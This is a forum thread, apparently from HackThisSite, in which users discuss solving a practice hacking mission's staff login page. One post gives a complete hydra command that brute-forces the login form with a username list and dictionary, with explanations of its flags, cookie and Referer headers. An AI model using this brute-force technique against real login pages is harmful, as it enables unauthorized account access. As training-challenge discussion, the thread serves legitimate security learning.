RiNSpy wrote:Ok, managed to log in as s****. But how were we supposed to figure out to try her? Or should we have just tried every teacher out there? Makes no sense.
Theist17 wrote:Hey guys, I'm having real trouble with the staff login. I have a username, but I haven't a single idea about the password.
KouluAccount wrote:Managed finally get through. Some hints for above posters (hopefully not too spoilish)
Many have said s****** already. Why?
I just wanted to point out that there are multiple logins that work, not just s******. Some people might find this helpful, if not down-right bad ass:
- Code: Select all
hydra -L staffList.txt -P /usr/share/dict/cracklib-small -e nsr 126.96.36.199 http-post-form "/missions/realistic/10/staff.php:username=^USER^&password=^PASS^:S=Welcome:H=Cookie:PHPSESSID=YOURPHPSESSID:H=Referer:www.hackthissite.org/missions/realistic/10/staff.php" -V
Some notes about above command:
-e nsr; trys null (n), same (s), and reverse (r) of the username for the password (try the easy stuff first
S=Welcome; Successful (S) login message, searches reply for "Welcome" string to determine a successful password. Alternatively, you can omit the S= flag to check for a fail message.
; hydra can set any header (H) values to whatever you want. In this case we need the PHPSESSID cookie set in order to authorize a login attempt (security mechanism utilized by HTS, not the mission site).
H=Referer:www.hackthissite.org/missions/realistic/10/staff.php; (security mechanism utilized by the mission site)
I was able to find out which headers were needed by reviewing server responses via an ethereal (wireshark) dump.
and one last thing:INTERCEPTING PROXY > browser add-ons
in every single way. I'm shocked at how many people rely on firebug as their main attack tool...